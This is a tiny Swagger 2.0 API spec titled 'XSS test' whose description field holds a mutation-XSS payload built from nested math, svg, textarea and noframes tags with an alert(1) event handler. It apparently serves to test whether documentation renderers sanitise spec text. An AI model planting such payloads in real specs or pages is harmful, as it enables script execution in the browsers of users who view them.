swagger: '2.0'
info:
  title: XSS test
  description:   <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><noframes onafterscriptexecute=alert(1)><script>1</script>">
  version: production
